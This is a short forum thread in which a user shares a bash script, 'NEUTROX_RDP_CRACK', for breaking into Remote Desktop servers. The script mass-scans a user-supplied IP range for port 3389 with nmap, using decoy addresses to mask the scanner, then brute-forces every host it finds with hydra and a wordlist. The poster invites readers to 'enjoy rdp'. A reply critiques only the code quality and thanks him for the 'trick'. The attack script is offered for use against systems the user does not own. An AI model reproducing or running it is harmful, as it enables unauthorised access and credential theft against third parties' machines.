Ok i show you a simple script to crack rdp

Imagen

Código: Seleccionar todo

#!/bin/bash
echo "
#####################################projectneutrox#####################################
################ MADE BY #######################################
#                                                              #
#                        NEUTROX_RDP_CRACK                     #
#                                                              #
#                                                              #
################################################################
########################################################################################
CRACKING_RDP!!!!!!"
echo
"_______________________________________________________________________________________"
echo -n "IP to scan, enter like this XXX.XXX.0-255.*:"
read -e IP
nmap -sS -p 3389 -PS3389 -D someip,otherip $IP --open -oG scan_rdp.txt|grep -oiE '([0-9]{1,3}\.){3}[0-9]{1,3}'> clean_rdp.txt
rm -rf scan_rdp.txt
hydra -s 3389 -v -V -L simple_worldlist.txt -P simple_worldlist.txt -e ns -t 16 -w 200 -M clean_rdp.txt rdp
rm -rf clean_rdp.txt
echo "GOOD LUCK!!!!!!!!! Finish!!!!!!!!!!"
ok gays, put ip you want on someip,otherip
and enjoy rdp
Imagen
Intresting, but i look a to low programing skill on your script. You forgot to mention that the owner should have installed nmap & hydra.
By your side, in the script i think that need some kind of testing to execute the nmap and hydra sentences! Thanks for share trick!
1337 & culture!
Responder

Volver a “Linux”